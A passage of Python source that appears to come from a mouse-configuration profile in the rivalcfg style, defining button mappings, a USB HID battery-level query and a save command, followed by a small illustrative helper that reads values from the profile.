"Button2": {"id": 0x02, "offset": 0x05, "default": "button2"},
"Button3": {"id": 0x03, "offset": 0x0A, "default": "button3"},
"Button4": {"id": 0x04, "offset": 0x0F, "default": "button4"},
"Button5": {"id": 0x05, "offset": 0x14, "default": "button5"},
"Button6": {"id": 0x06, "offset": 0x19, "default": "dpi"},
},
"button_field_length": 5,
"button_disable": 0x00,
"button_keyboard": 0x51,
"button_multimedia": 0x61,
"button_dpi_switch": 0x30,
"button_scroll_up": 0x31,
"button_scroll_down": 0x32,
# fmt: on
"default": "buttons(button1=button1; button2=button2; button3=button3; button4=button4; button5=button5; button6=dpi)",
},
},
"battery_level": {
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0xAA, 0x01],
"response_length": 3,
"is_charging": lambda data: bool(data[2]),
"level": lambda data: int(data[0]),
},
"save_command": {
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x09],
},
}
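# Hedged example (not part of the original rivalcfg module above): the profile is plain
# data, so individual settings can be inspected directly. The helper below only reads the
# dictionary defined above; the sample battery report bytes are fabricated for illustration.
def describe_profile_sketch():
    """Illustrative helper: pulls a few values out of the profile dictionary."""
    polling = profile["settings"]["polling_rate"]
    battery = profile["battery_level"]
    return {
        "byte_for_500hz": polling["choices"][500],                 # 0x01
        "battery_percent": battery["level"]([0x42, 0x00, 0x01]),   # 66
        "charging": battery["is_charging"]([0x42, 0x00, 0x01]),    # True
    }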
|